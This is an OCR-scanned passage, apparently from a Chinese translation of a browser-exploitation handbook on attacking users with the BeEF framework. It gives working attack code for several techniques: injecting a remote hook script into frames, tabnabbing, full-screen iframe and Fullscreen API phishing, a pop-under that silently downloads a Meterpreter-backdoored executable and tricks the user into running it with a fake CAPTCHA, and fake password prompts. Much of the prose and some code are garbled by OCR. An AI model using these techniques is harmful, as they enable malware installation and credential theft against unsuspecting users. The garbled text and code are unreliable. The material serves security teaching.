f.data += ' - Method: '«$j(e.target).attr('method'); 
f.data += ' - Values:\n'+values; 


this.events.push(f); 


} catch(e) {} 
j 


beef.logger. e 定 义 


键盘 事件 等 , 便于 将 各 种 二 











了 一 种 简单 的 事件 结构 ， 它 可 以 兼容 各 种 事件 类 型 ， 比 如 鼠标 事件 、 
有 件 以 统一 的 形式 传 回 BeEF 服 务 器 。 函 数 中 的 for 循 环 用 于 遍历 表单 中 




















所 有 的 子 元 素 。 有 一 点 需要 注意 ， 这 段 代码 并 未 考虑 表单 字段 中 存在 Gisabled 属 性 的 情形 。 


5.2.5 ”使 用 IFrame 按键 记录 


除了 可 以 向 当前 窗口 中 的 DOM 绑 定 事件 记录 函数 ， 也 可 以 在 SOP 的 范围 内 ， 向 其 他 IFrame 
绑 定 JavaScript。DOM 通 过 frames 对 象 暴露 出 当前 文档 中 所 有 的 frame。 

BeEF 的 DOM 记 录 模 块 的 一 个 功能 是 : 循环 遍历 当前 DOM 中 的 frame ， 尝 试 对 每 个 同 源 的 
IFrame 重 新 下 和 钓 子 。 随 后 ， 对 DOM 事 件 的 记录 也 会 延伸 到 这 些 frame 中 。 这 个 任务 由 

















beef .browser.hookChi 


/** 




















ldFrames () 函数 完成 ， 其 代码 如 下 : 


* 为 连 当前 窗口 中 的 所 有 子 框架 


* 存在 同 源 策略 限制 
af 


hookChildFrames:function () { 


// 创建 script 对 象 


var script = document.createElement ('script'); 
script.type = 'text/javascript'; 


script.sre 
<== Qbeef port 


// 选 代 子 框架 


'«$-- QGQbeef proto %>://<%== @beef_host $»: 


$»«$-- QGhook file %>'; 


for (var i=0;i<self.frames.length;i++) { 
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try { 
// Hm QAR 
self.frames[i].document.body.appendChild(script); 
) catch (e) ( 
} 
} 
j 


在 这 个 函数 中 , 首先 创建 了 一 个 script 元 素 , 最 后 遍历 各 个 frame， 并 在 各 frame 的 body 中 插 
人 该 script。 

除了 尝试 自动 勾 连 所 有 的 子 frame, BeEF 还 提供 了 一 个 单独 的 命令 模块 , 来 执行 类 似 的 功能 。 
这 个 模块 就 是 I[Frame Event Logger。 当 你 想 在 当前 窗口 之 上 弹出 一 个 重 欠 的 IFrame， 并 且 收 集 键 
盘 记 录 而 非 全 部 BeEF 的 勾 连 事件 日 志 时 ， 这 个 模块 非常 有 用 。 

在 本 节 中 , 我 们 探究 了 你 作为 一 名 攻击 者 监控 用 户 动作 时 可 以 使 用 的 事件 监听 途径 。 随 着 浏 
览 絮 的 持续 升级 以 及 新 功能 的 引入 , 极 有 可 能 会 有 不 少 新 的 事件 处 理 逻 辑 加 入 进来 。 一 个 典型 的 
案例 是 移动 设备 使 用 量 的 急速 增长 ， 这 促使 W3C 引 入 了 触摸 事 件 *。 随 着 时 间 的 推移 ， 主 流 浏览 
侣 的 DOMS5 引 入 新 事件 的 同时 ， 也 引入 了 潜在 的 监控 以 及 攻击 的 途径 。 


5.3 ”社会 工程 学 


在 第 2 草 中 ， 你 曾 见识 过 社会 工程 学 的 威力 ， 这 是 一 种 在 目标 浏览 器 中 执行 初始 控制 代码 的 
有 效 方式 。 当 然 ， 社 会 工程 学 的 手段 远 不 止 这 些 。 你 可 以 发 掘 出 非常 多 的 社会 工程 学 方法 , KE 
Ed HJ BST Vie ETE o 

很 多 时 候 ,“ 问 ”是 你 向 目标 获取 信息 的 最 简单 的 方式 。 一 个 精心 构造 的 社会 工程 学 诱饵 ， 
尤其 是 当 它 处 在 一 个 正常 的 浏览 会 话 中 时 ,很 容易 使 大 部 分 用 户 上 钩 。 这 些 诱 饵 有 很 多 形式 ， 比 
如 虚假 的 软件 升级 、 伪 造 的 登录 表单 、 恶 意 伪 造 的 小 程序 等 。 

我 们 在 后 面 的 几 小 节 中 讨论 的 许多 技术 方案 可 以 在 浏览 器 之 外 使 用 , 尤其 是 那些 诱导 用 户 运 
行程 序 的 方案 。 在 浏览 器 之 外 执行 代码 的 最 简单 的 办 法 ,通常 是 获取 用 户 的 信任 , 尤其 当 用 户 处 
在 一 个 较 安 全 且 补 丁 完善 的 操作 系统 中 时 。 


5.3.1 使 用 标签 绑架 


在 本 章 的 前 一 部 分 ， 你 已 经 见识 过 了 对 DOM 进 行事 件 劫持 的 威力 。 在 你 已 经 掌控 了 用 户 与 
特定 页 面 的 交互 操作 后 ， 就 可 以 很 方便 地 在 用 户 未 浏览 当前 窗口 时 寻找 下 手 的 时 机 。 目 前 ,浏览 
器 的 标签 页 功能 广 受 欢迎 , 用户 经 带 会 在 标签 页 之 间 切 换 。 如 果 你 已 经 对 bluzr 事 件 进行 了 监听 ， 
便 可 以 轻松 地 获取 到 用 户 离开 勾 连 窗口 的 时 长 。 演 示 代 码 如 下 : 

var idle timer; 

begin_countdown = function() { 

idle_timer = setTimeout(function() { 


performComplicatedBackgroundFunction(); 
), 60000); 
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} 

Sj (window) .blur (function(e) { 
begin countdown(); 

} 

$j (window) .focus = function() { 
clearTimeout (idle_timer) ; 


} 

KERR EXIT —Pidle_timer ip All—Pbegin_countdown Pia, 3APEZNATTNI, & 
PE TAY SRA idle_timer, 计时 器 在 1 分 钟 后 会 执行 performCcomplicatedBackgroungd 
Function() 。 这 个 函数 会 在 窗口 触发 bluzr 事 件 时 执行 。 此 外 我 们 还 监听 了 focus 事 件 ， 目 的 是 
能 在 用 户 返 回 标签 页 时 停止 定时 顺 。 

对 于 拥有 控制 权 的 标签 页 , 可 以 在 其 不 可 见 时 替换 其 中 的 内 容 或 页 面 地 址 , 这 种 标签 绑架 的 
思路 最 早 由 Aza Raskin 提 出 5。BeEF 的 TabNabbing 命 令 模 块 提 供 了 类 似 的 逻辑 。 默 认 情 况 下 ， 这 
个 模块 会 从 用 户 那 儿 取得 两 个 参数 : 计时 器 等 待 的 时 长 ， 以 及 浏览 器 重 定向 的 目标 URL。 此 外 ， 
为 了 使 攻击 更 加 有 效 ， 你 还 可 以 使 用 beef . browser. changeFavicon () 来 修改 页 面 的 图 标 。 

将 不 可 见 标签 中 的 URL 蔡 换 成 一 个 克隆 网 站 的 URL, 这 是 标签 绑架 攻击 的 一 种 典型 案例 , 其 
中 用 到 BeEF 的 “社会 工程 学 ”扩展 ， 我 们 曾 在 2.2.4 节 中 介绍 过 。 在 URL 替 换 完成 后 ， 你 仍然 拥 
有 页 面 的 控制 权 ， 这 时 可 以 同时 显示 一 个 credential harvester 页 面 。 


5.3.2 ”使 用 全 屏 


全 屏 攻 击 是 一 种 很 棒 的 无 感知 攻击 的 方法 。 此 方法 我 们 曾 在 第 3 章 的 “使 用 完全 受 加 层 ” 小 
节 中 介绍 过 , 但 是 还 可 以 对 其 进行 扩展 ， 尤 其 是 在 已 经 勾 连 的 页 面 中 。 

如 果 你 已 经 攻陷 了 一 个 页 面 , 而且 希 望 能 够 持续 对 勾 连 浏览 融 进 行 控制 , 那么 可 以 采用 一 个 
小 技巧 : 将 勾 连 的 DOM 中 所 有 的 当前 链接 重 写 ， 以 把 它们 加 载 到 全 屏 的 IFrame。 这 里 我 们 复 用 
曾 在 第 3 章 中 介绍 过 的 代码 片段 ， 来 创建 这 个 全 屏 的 IFrame: 


createlframe: function(type, params, styles, onload) { 































































































var ess = [ir 
if (type == 'hidden') { 
css = $j.extend(true, { 
'border':'none', 'width':'lpx', 'height':'1lpx', 
'display':'none', 'visibility':'hidden'}, 
styles); 
J 
if (type == 'fullscreen') { 
css = $j.extend(true, { 
'border':'none', 'background-color':'white', 'width':'100%', 
'height':'100$', 
'position':'absolute', 'top':'Opx', 'left':'Opx'), 
styles); 


$j('body').css(('padding':'Opx', 'margin':'Opx'}); 
j 


var iframe = $j('<iframe /»').attr(params).css(css).load(onload). 
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攻击 用 户 





prependTo('body'); 


return iframe; 





WJH : 


$j('a').click(function(event) ( 
if (Si tthis].dttri'hreR') le 


借助 强大 的 jQuery 选择 器 , 我 们 可 以 用 非常 简单 的 语句 , 实现 对 当前 DOM 中 所 有 锚 点 元 素 的 


da st 


event .preventDefault(); 
beef.dom.createIframe('fullscreen', 
('src':$j(this).attr('href')), 


{}, 
null 
) . 


$j (document).attr('title',$j(this).html()); 


document.body.scroll - "no"; 
document.documentElement.style.overflow - 'hidden'; 


} 
3): 


对 当前 DOM 中 的 所 有 链接 执行 以 下 操作 。 


























(1) 首先 使 用 if 语句 ， 判 断 当 前 链接 中 是 否 包含 HREF 属 性 ; 脚本 只 会 覆盖 包含 HREF 属 性 的 

















链接 。 




















(2) 接着 调用 preventDefault () 函数 ， 阻 止 该 事件 在 事件 流 中 继续 传播 。 

(3) 然后 调用 createIframe () 函数 , 创建 一 个 全 屏 大 小 的 IFrame, 其 源 为 链接 的 HREF 属 性 值 。 

(4) 下 一 步 是 把 当前 勾 连 页 面 的 标题 更 新 为 锚 点 元 素 的 文本 内 容 。 例 如 ， 若 链接 的 代码 为 
<a href="http://beefproject.com">BeEF Project</a>, 那 么 页 面 标题 将 会 更 新 为 "BeEF 





Project", 
































(5) 最 后 为 了 更 好 地 隐藏 IFrame 以 下 的 内 容 ， 我 们 禁用 了 当前 文档 的 滚动 条 ， 并 将 其 样式 中 
的 overflow 属 性 设置 为 hidden。 
在 这 些 操 作 执 行 后 ,虽然 所 有 的 链接 看 上 去 未 发 生 任 何 变 化 ,但 是 点 击 时 的 动作 却 大 有 不 同 。 














重 写 后 的 链接 在 被 点 击 时 ， 会 在 当前 DOM 的 顶层 弹出 一 个 全 屏 大 小 的 IFrame， 尽 管 页 面 的 内 容 








均 包 庄 在 IFrame 中 ,让 用 户 看 上 去 却 觉得 一 切 正常 。 但 就 像 我 们 在 前 几 章 中 讲 到 的 ， 用 户 很 可 能 
会 察觉 到 一 些 蛛丝马迹 ， 然 后 进行 进一步 的 甄别 。 











图 5-5 展 示 了 一 个 已 经 进行 了 链接 蔡 换 的 页 面 。 注 意 看 图 中 框 出 的 部 分 ， 真 实 的 目标 URL 仍 


然 显示 在 状态 栏 中 。 























图 5-6 展 示 了 点 击 链接 后 的 页 面 。 地 址 栏 中 的 地 址 未 发 生变 化 ， 但 页 面 标题 


改 成 了 被 点 击 的 链接 的 名 字 。 如 果 你 访问 http://beefproject.com， 就 会 发 现 其 实 这 个 页 面 真正 的 标 








题 是 “BeEF — The Browser Exploitation Framework Project” o 





SBB anm x 





€ > Q [localhost 3000/demos/butcher/index.html 





Welcome to The Butcher, your source of 
delicious meats. Please feel free to view our 
samples, sign up to our mailing-list or purchase 
our special BeEF-hamper! 


Our Meaty Friends Order Your BeEF-Hamper 


Thanks to hap /ma flicks com/photos bull de/ and http //deneSarasota com tor the Beff images 





www.beefproject.com 








图 5-5 E BERE 





€ > Œ D localhost:3000/demos/butcher/index.html 





© Got BeEF? 


» | Download Now 


=eEF 


THE BROWSER EXPLOITATION FRAMEWORK PROJECT 


a GitHub Source Control a Bug Reporting a Blog [w] Wiki G Twitter YouTube lin] Linkedin Mailing List 


What is BeEF? [eU Tio 
Event 
BeEF is short for The Browser Exploitation Framework. It is a 5.6908 - [Gur] Browser has lost focus. 


penetration testing tool that focuses on the web browser. 163.520s - [Focus] Browser has regained focus. 


Amid growing concerns about web-borne attacks against 1635356 - Blur] Browser hes lost focus. 
clients, including mobile clients, BeEF allows the professional 0.9000 -Forud Wowser hae regsnad focus 
penetration tester to assess the actual security posture of a hisses ec! kadai ase 
target environment by using client-side attack vectors. Unlike UN en! hi eral Hao OE MON 
other security frameworks, BeEF looks past the hardened Hoses rode 127,020 han GM CM TRACKS ham cor ID woes ew Ua 
network perimeter and client system, and examines 58.8138 - Fonal Frowser has ropisi focis 
exploitability within the context of the one open door: the web 227136 - Focusi Browser hes regained focus, 
browser. BeEF will hook one or more web browsers and use on - Fas} roveet hen lan focos 

them as beachheads for launching directed command 

modules and further attacks against the system from within 

the browser context. 





图 $-6 ”全屏 大 小 的 IFrame 


BeEF 将 上 文 描述 的 逻辑 封装 成 Create Foreground IFrame 模 块 。 但 如 果 你 是 个 急性 子 ， 也 可 以 
使 用 一 种 更 直接 的 方式 加 载 IFrame。 为 了 尽量 减 小 被 用 户 察觉 的 可 能 性 , 可 以 借助 BeEF 的 事件 模 
块 对 用 户 进行 监控 ， 当 用 户 跳 出 页 面 后 ， 使 用 Redirect Browser (iFrame) 模 块 ， 打 开 一 个 新 的 全 屏 
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大 小 的 IFrame， 如 图 5-7 所 示 。 男 一 个 避免 用 户 察 觉 的 技巧 ,是 直接 在 IFrame 中 加 载 当前 页 面 , 这 
样 用 户 在 继续 浏览 页 面 时 ， 并 不 会 察觉 到 他 们 已 经 被 困 在 一 个 窗口 里 了 。 





0 OO [geceFconrolpanel x\ 
€ > C [D localhost:3000/ui/panel mE — — we 


* BeEF 04.4.9-alpha | Submit Bug | Logout 








Hooked Browsers. | Getting Started X|| Logs Current Browser 
4 C Online Browsers } E : 
4 C3localhost | Details | Logs | Commands | Rider | XssRays | Ipec | 
€ 8 127001 
CJ Offine Browsers. 


> Type Event Date 


O. 
Event 19.874s - [Blur] Browser window has lost focus, 2013-11- 
25T16:47:1340... 


18.0685 - [Mouse Click] X: 406 y:517 > divitcontent 2013-11- 
25T16:47:1340.. 
17.2625 - [Focus] Browser window has regained focus. 2013-11- 
257 16:47:13+0.. 
3.506s - [Blur] Browser window has lost focus. 2013-11- 
257 16:46:58+0... 
2.0708 - [Mouse Click] x: 357 y:158 > img 2013-11- 
25T16:46:5840... 
and ^ Hooked browser [id:1, ip:127.0.0.1] has executed instructions from command module [id:1, 2013-11- 
name:'Create Foreground iFrame] 25T16:41:1890.. 
127.0.0.1 appears to have come back online 2013-11- 
257 16:37:13+0.. 


k 
9 
8 
7 
6 
5 
4 
2 
1 


127.0.0.1 just joined the horde from the domain: localhost:3000 jo 
25T16:37:0840... 




















图 5-7 BeEF 事 件 浏 览 器 一 一 等 待 失 去 焦点 事件 


有 一 种 更 高 级 的 全 屏 攻击 方式 , 是 利用 HTML 5 的 全 屏 显 示 API。 目 前 大 多 数 浏览 器 均 提 供 了 
进行 全 屏 显 示 的 方法 ， 比 如 在 Windows 下 的 卫 中 按 Fl11 键 切换 全 屏 。 借 助 HTML 5 的 全 屏 显 示 API， 
切换 全 屏 的 操作 也 可 以 由 程序 控制 浏览 器 完成 ，YouTube 也 是 利用 此 方法 进行 全 屏 播放 的 。 

Feross Aboukhadijeh 的 攻击 实例 表明 ， 如 果 你 的 目标 毫 无 戒心 ， 那么 你 可 以 使 用 许多 高 级 的 
钓鱼 手法 ， 其 中 就 包括 使 用 HTML5 的 全 屏 显 示 特 性 。 要 了 解 关于 此 次 攻击 的 详细 信息 ， 你 可 以 
访问 链接 : http://feross.org/html5-fullscreen-api-attack/。 此 次 攻击 可 以 归纳 为 以 下 步骤。 

(1) 在 当前 页 面 中 添加 一 些 隐藏 的 HTML 元 素 ， 用 于 模拟 用 户 的 系统 和 浏览 需 

(2) 根据 用 户 的 系统 和 浏览 器 不 同 ， 变 更 元 素 的 样式 。 

(3) 拦截 用 户 的 点 击 事件 ,然后 打开 虚假 的 链接 。 在 Aboukhadijeh 的 例子 中 , 他 修改 了 原本 指 
向 https:/www.bankofamerica.com 的 链接 。 当 用 户 点 击 这 个 链接 时 ， 执 行 下 面 的 动作 。 

1) 阻止 默认 动作 并 停止 事件 冒 泡 。 
2) 将 浏览 器 切换 至 全 屏 模式 。 
3) 显示 之 前 隐藏 的 HTML 元 素 。 
4) 在 主要 的 HTML 元 素 中 填 人 虚假 的 内 容 。 在 本 例 中 是 一 张 美国 银行 网 站 的 截图 。 
由 于 不 同 的 浏览 器 之 间 存 在 差异 , 所 以 适用 的 切换 全 屏 模式 的 代码 也 略 有 不 同 。 可 以 使 用 下 
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面 的 函数 屏蔽 差异 : 


function requestFullScreen() { 
if (elementPrototype.requestFullscreen) { 


we 


we 


j 
} 


document .documentElement.requestFullscreen(); 

else if (elementPrototype.webkitRequestFullScreen) { 
document .documentElement .webkitRequestFullScreen ( 
Element .ALLOW_KEYBOARD_INPUT) ; 

else if (elementPrototype.mozRequestFullScreen) { 
document .documentElement .mozRequestFullScreen(); 
else { 
/* can't go fullscreen */ 





EIA, Sindre Sorhus 也 实现 了 一 个 提供 同样 功能 的 JavaScript 库 85。 但 有 一 点 要 注意 ， 尽 
管 你 可 以 使 用 程序 将 浏览 器 切换 至 全 屏 模 式 , 但 是 浏览 器 会 回 用 户 弹出 一 个 警告 对 话 框 , 如 图 5-8 


所 示 。 











feross.org is now full screen. Exit Full Screen | Allow 





Corporation [US] https://www.bankofamerica.com 








Personal Small Business Wealth Management Businesses & Institutions 


Bankof America 7^ 


Locations Contactus Help En español Search Bank of America 


—T 
Borrow Invest (x Protect Plan 
@ Savo this Onine ID Enrol —— ————— — 
[ Select account location :| 

Helploptions 


Know your 
halance 








图 5-8 ”全 屏 警 告 


为 了 减少 用 户 对 伪造 的 全 屏 显 示 内 容 产生 怀疑 的 可 能 性 , 可 以 尝试 使 用 与 原 网 站 域名 较为 相 
似 的 域名 加 载 fame， 这 样 警告 对 话 框 中 的 网 址 和 已 加 载 的 网 址 对 比 起 来 差异 较 小 ， 几 乎 可 以 说 
是 一 模 一 样 的 。 


5.3.3 





UI 期 望 滥用 





_ 大 部 分 浏 览 器 已 经 将 文件 的 下 载 、 插 件 的 激活 和 HTML5 的 API 调 用 时 的 模 态 通知 改 为 了 非 模 


对 用 户 进 


可 用 性 。 











唯 独 Safari 除 外 ， 它 ( 在 本 书写 作 时 ) 仍旧 使 用 模 态 通知 。 如 图 5-9 所 示 ， 非 模 态 通知 在 
行 提醒 和 通知 时 ,不 会 干扰 页 面 的 浏览 。 换 言 之, 其 目的 是 在 不 干扰 用 户 的 前 提 下 提升 














图 5-9” 非 模 态 通知 示例 
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Rosario Valotta 曾 在 2013 年 的 Hack In The Box 黑 客 大 会 上 , 展示 过 关于 在 不 同 浏览 需 中 滥用 这 
些 非 模 态 对 话 框 的 研究 “。 首 先 ， 正 如 本 章 前 面 提 过 的 ， 非 模 态 通知 很 容易 被 模仿 。 只 需要 几 行 
JavaScript 以 及 CSS 的 代码 ,就 可 以 很 轻易 地 伪造 出 类 似 Chrome 或 者 下 下 载 可 执行 程序 时 的 通知 窗 
口 。 此 外 ，Rosario 还 提出 了 非 模 态 通知 的 四 个 要 点 。 
口 即便 窗口 处 于 后 台 运 行 ， 非 模 态 通知 仍然 可 以 正常 显示 ， 例 如 弹出 广告 或 打开 辅助 窗口 。 
口 键盘 快捷 键 同 样 适用 于 通知 栏 。 根 据 浏 览 器 语言 的 不 同 ， 在 浏览 器 发 出 通知 时 ， 你 可 以 
用 快捷 键 Alt+R (Run, KERA T )， 或 快捷 键 Alt+E ( Esegui， 意 大 利 语系 统 下 )， 运 行 
可 执行 程序 。 
口 可 以 使 用 Tab 键 在 通知 栏 上 切换 焦点 ， 例 如 可 以 从 运行 按钮 切换 到 保存 或 者 取消 按钮 。 
Q 非 模 态 通知 栏 与 导航 窗口 绑 定 ， 所 以 它们 会 随 着 窗口 的 移动 、 变 形 或 关闭 而 做 出 相应 的 
变化 。 
你 可 能 已 经 注意 到 了 ， 此 处 存在 一 些 用 于 攻击 用 户 的 潜在 安全 问题 。 事 实 上 , 正 是 由 于 这 些 
非 模 态 对 话 框 的 种 种 特征 ,使 攻击 变 得 非常 容易 。 在 正中， 用 户 只 要 被 诱导 按 下 一 个 键 , 就 可 能 
在 毫 不 知情 的 情况 下 运行 一 个 可 执行 程序 。 
谷歌 的 Chrome 也 存在 类 似 的 问题 ， 唯 一 的 不 同 是 需要 用 户 做 的 不 再 是 按 下 按键 ， 而 是 点 击 
鼠标 。 让 我 们 来 详细 分 析 一 下 在 下 下 这 种 攻击 的 原理 。 后 面 提 供 了 Rosario 的 “Proof of Concept” 
原始 代码 的 精简 版 本 ， 以 及 相关 屏幕 截图 。 
结合 前 面 提 到 的 非 模 态 通 知 的 四 个 要 点 , 我 们 还 原 出 Windows 7 操作 系统 下 ，IE9 或 IE10 的 用 
户 被 攻击 的 全 过 程 。 
(1) 用 jQuery 弹出 功能 ( 参见 第 3 章 )， 在 窗口 中 弹出 一 个 弹 窗 。 
(2) 弹出 窗口 的 同时 下 载 一 个 可 执行 程序 ， 例 如 一 个 含有 Metasploit Meterpreter 后 门 的 程序 ， 
该 程序 运行 时 会 自动 连接 回 browserhacker.com。 
(3) 尽管 模 态 通知 已 经 发 出 ， 但 对 用 户 来 说 是 不 可 见 的 ， 因 为 打开 的 弹 窗 正好 被 遮挡 在 当前 
导航 窗口 下 。 
(4) 此 时 ， 该 弹 窗 尽管 仍 处 在 后 台 ， 但 是 已 经 获得 了 焦点 。 换 言 之 ， 此 时 用 户 的 任何 按键 操 
作 都 会 直接 作用 于 该 弹 窗 。 
(5) 现在 你 可 以 使 用 一 些 社 会 工程 学 的 技巧 ， 让 用 户 自觉 自愿 地 按 下 R 键 、 空 格 键 或 Enter 键 ， 
按 这 些 键 的 效果 等 同 于 用 户 在 非 模 态 对 话 框 中 点 击 Run 按 钮 。 这 样 ， 我 们 已 经 成 功 地 在 没有 引起 
用 户 注意 的 前 提 下 执行 了 代码 。 
使 用 下 面 的 代码 即 可 以 实现 这 个 漂亮 的 攻击 : 
<!DOCTYPE html> 
<html> 
<head> 
<!-- with IE9, the focus of the pop-under is on the 
notification bar, which facilitates the attack --> 
<meta http-equiv-"X-UA-Compatible" content-"IE-EmulateIE7" /> 


</head> 
<body> 
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<h2>Private Forum 

<br> 

<h3>Click the button to start registration 

<div> 

«button onclick="loadpopunder ()">Start</button> 

</div> 

<script> 

function loadpopunder () { 
win3-window.open('popunder.html','', 
'topz0, left=0,width=500,height=500'); 
win3.blur(); 
document.write("Loading..."); 
document.location-"captcha.html"; 
doit(); 

} 

function doit()( 
win3=window.open('popunder.html','', 
'topz0, left=0,width=500,height=500'); 
win3.blur(); 

di 

</script> 

</body> 

</html> 


当 用 户 点 击 Start 按 钮 时 ,会 执行 oadpopunder () 函数 ， 然 后 会 弹出 一 个 新 窗口 ， 并 在 其 中 
加 载 popunder.html 页 面 。popunder.html 页 面包 含 的 代码 如 下 : 


<!DOCTYPE html» 








<html> 

<head> 

«meta charset-"utf-8" /> 

<!-- with IE9, the focus of the pop-under is on the 


notification bar, which facilitates the attack --> 
«meta http-equiv-"X-UA-Compatible" content-"IE-EmulateIE7" /> 
<title>Exploit Demo</title> 

</head> 

<body style='height: 1000px' > 

<iframe id="f1" width="100" height="100"></iframe> 
<script type="text/javascript"> 

document .getElementById("f1").src="malicious.exe"; 
</script> 

</body> 

</html> 


由 于 弹 窗 被 很 好 地 隐藏 在 当前 浏览 窗口 背后 ， 因 此 用 户 很 难 注意 到 这 些 变 化 。 然 而 ， 此 时 
JavaScript 代 码 已 经 动态 地 修改 了 IFrame 的 源 ， 以 便于 触发 可 执行 程序 的 下 载 。 同时， 当前 页 面 也 
跳 转 至 captcha.html : 

<!DOCTYPE html> 

<html> 

<head> 


<!-- with IE9, the focus of the pop-under is on the 
notification bar, which facilitates the attack --> 
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«meta http-equiv="X-UA-Compatible" content-"IE-EmulateIE7" /> 
</head> 
<body> 
<h2>To proceed with registration we need 
to verify you are not a bot... 
<br> 
<h3>Type the text shown below:</h3> 
<img src="blink.gif"></img> 
<img src="captcha.png" 
style="position:absolute; top:120px; left:170px"></img> 
</body> 
</html> 


这 个 虚假 的 验证 码 输入 框 可 以 诱导 用 户 按 下 你 需要 的 按键 , 比如 本 例 中 在 英文 操作 系统 下 的 
R 键 (运行 )。 图 5-10 和 图 5-11 展 示 了 当 用 户 按 下 R 键 ( 虚假 的 验证 码 图 片 中 的 首 字 母 ) 后 的 效果 。 











Pro Jl @ browserhacker.com 





To proceed with registration we need to verify you are not a bot... 


Type the text shown below: 


CosmicBreak BBs = InstallShield Wizard 








Preparando para instalar... 


O programa de instalação do CosmicBreak, BR está 
preparando o InstallShield Wizard para ajudá-lo com o 
processo de instalação. Aguarde. 


Configurando o instalador do Windows 


-= 














图 5-10 用户 被 诱导 点 击 R 键 后 ， 程 序 开始 运行 


为 了 能 使 通知 栏 在 默认 状态 下 获得 焦点 ， 在 上 文 代码 中 我 们 使 用 了 meta 标 签 ， 将 IE 引擎 设 
置 为 IE7 兼 容 模式 。 在 该 模式 中 ， 浏 览 器 会 默认 激活 通知 栏 ， 与 在 卫 7 的 逻辑 相同 。 这 也 就 意味 
着 ， 只 需 按 下 R 键 〈 而 无 需 Tab+R ) 即 可 执行 该 程序 。 这 个 看 似 简单 的 变化 无 疑 大 大 提升 了 攻击 
的 效果 。 
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© hitp://browserhacker.com/ui-abuse/popunder.html 


‘ are not a bot... 








Windows Installer 


$8 Preparing to install. 






































图 5-11 安装 自动 开始 | 


这 个 攻击 手法 存在 两 大 天 敌 : 用 户 访问 控制 (User Access Control, UAC ) RITERJSmartScreen 
筛选 器 ”。 然 而 ，UAC 并 不 会 给 我 们 带 来 很 多 困扰 ,因为 它 只 对 需要 管理 员 权限 才能 执行 的 程序 
有 效 ， 而 一 个 带 有 Meterpreter 后 门 的 程序 并 不 需要 这 些 权 限 。 另 一 个 麻烦 是 下 的 SmartScreen。 微 
软 从 IE8 起 引入 了 SmartScreen ， 通 过 内 建 黑 名 单 的 机 制 来 阻止 潜在 的 危险 程序 在 用 户 不 知情 的 情 
况 下 运行 。 在 图 $-12 中 ， 我 们 可 以 看 到 SmartScreen 筛 选 吉 运行 的 几 个 实例 。 














Do you want to run or save thebat home 4-2-42.msi (6.87 MB) from fs13.filehippo.com? 





(GP melwarezip.zip is unsafe to download and was blocked by SmartScreen Filter, Le 








f se iw B 
GP 02-FHU-IVU.exe is not commonly downloaded and could harm your computer. Delete Actions || View downloads x | —— — pi 2E aA T 





图 5-12 SmartScreen hifi De gis 11 KH] 


与 大 部 分 基于 黑 名 单 的 检测 类 似 ，SmartScreen 无 法 做 到 百 分 百 可 靠 。 根据 Valotta 的 人 研究， 
Twitter 上 20% 的 短 连 接 URL 都 会 指向 可 以 绕 过 SmartScreen 和 筛选 器 的 程序 ， 即 exetweets。 而 且 ， 若 
程序 使 用 了 Symantec Extended Validation 证 书签 名 ，SmartScreen 将 不 再 检查 该 文件 以 及 其 发 布 者 ， 
而 是 默认 该 程序 安全 ”。 

1. 使 用 伪造 的 登录 输入 框 

你 可 能 会 有 疑惑 ， 既然 我 们 已 经 有 能 力 监控 用 户 所 有 的 键盘 事件 , 为 什么 还 需要 通过 其 他 途 
径 获 得 他 们 的 用 户 名 和 密码 呢 ? 毕竟 你 已 经 可 以 查看 他 们 全 部 的 按键 操作 ， 不 是 吗 ? 但 事实 上 ， 
监听 DOM keypress 的 事件 的 效果 ， 完 全 取决 于 在 应 用 中 下 钩子 的 地 方 。 

例如 ， 如 果 原 始 的 钩子 通过 在 登录 页 面 中 的 XSS 漏 洞 侵入 ， 那 么 接着 监 昕 DOM 的 keypress 
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事件 即 可 获取 到 用 户 的 用 户 名 和 密码 。 可 惜 ， 事情 并 不 总 是 如 我 们 所 愿 ， 很 多 情况 下 我 们 可 能 只 
能 在 用 户 登 录 后 才 有 机 会 侵入 浏览 器 。 当然 , 此 时 你 依然 可 以 获取 当前 会 话 的 cookie , 或 通过 BeEF 
提供 的 隧道 代理 操作 用 户 的 会 话 ， 但 这 仍旧 会 给 你 以 后 的 登录 带 来 不 便 。 

针对 未 起 疑心 的 用 户 而 言 , 获取 其 密码 可 以 获得 更 便捷 的 登录 以 及 其 他 诸多 好 处 。 在 基于 密 
码 的 单 因 子 认 证 系统 中 ， 密 码 复 用 是 一 个 较为 核心 的 问题 。 因 而 在 这 类 案例 中 ， 如 果 你 能 获得 用 
户 的 密码 ， 你 或 许可 以 在 多 个 系统 中 全 面 控制 该 用 户 。 

这 些 钓 鱼 攻击 的 效果 一 定 程 度 上 取决 于 所 侵入 的 网 页 环境 。 然 而 不 幸 的 是 , 许多 用 户 在 面 对 
警告 时 仍然 愿意 提交 自己 的 个 人 信息 。 这 也 在 一 定 程度 上 解释 了 为 什么 古老 的 钓鱼 网 站 在 银行 诈 
骗 中 仍然 卓有成效 。 如 果 你 能 够 吸引 足够 多 的 用 户 访问 该 网 站 , 你 依然 可 以 骗 到 一 部 分 人 泄露 他 
们 的 个 人 机 密 信息 。 

使 用 JavaScript 的 prompt () 函数 伪造 登录 提示 框 非常 简单 ， 代 码 如 下 所 示 : 


var answer = prompt ("Your session has expired. 
Please re-enter your password:"); 


当 该 代码 运行 时 ,会 弹出 一 个 对 话 框 并 自动 获得 焦点 ， 如 图 5-13 所 示 。 





















































O OQ / È BEF- The Browser Explo x 


CC [ beefproject.com 








The page at beefproject.com says: 


Your session has expired. Please re-enter your 
password: 


Password]| —— ~ | le E Linkedin 


BeEF is short for The Browser Exploitation Framework. It is a 
penetration testing tool that focuses on the web browser. 


Amid growing concerns about web-borne attacks against 
lients, including mobile clients, BeEF allows the professional 
penetration tester to assess the actual security posture of a 
arget environment by using client-side attack vectors. Unlike 
other security frameworks, BeEF looks past the hardened 


图 $-13 ”对 话 框 提示 


answer 变 量 会 直接 传递 给 攻击 者 ， 以 达到 窃取 密码 的 目的 。 但 是 该 方法 并 不 是 非常 有 效 ， 
因为 这 样 的 对 话 框 很 明显 与 原来 的 网 站 格格 不 入 。 而 且 在 用 户 输入 密码 时 ,输入 的 字符 均 为 明文 ， 
这 明显 与 大 部 分 密码 输入 框 不 同 。 

2. 完美 盗窃 

MER, 如 果 你 能 够 在 当前 勾 连 的 页 面 中 , 插入 你 需要 的 任何 内 容 , 那 你 几乎 可 以 伪造 出 一 个 
以 假 乱 真 的 登录 对 话 框 。 这 就 是 BeEF 的 Pretty Theft ( 完美 盗窃 ) 模块 的 功能 。 
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该 模块 带 有 一 套 经 过 设计 的 钓鱼 模板 ， 其 中 包括 一 些 以 下 列 网 站 为 目标 的 模板 : 
口 Facebook 
QO LinkedIn 
口 YouTube 
Q Yammer 
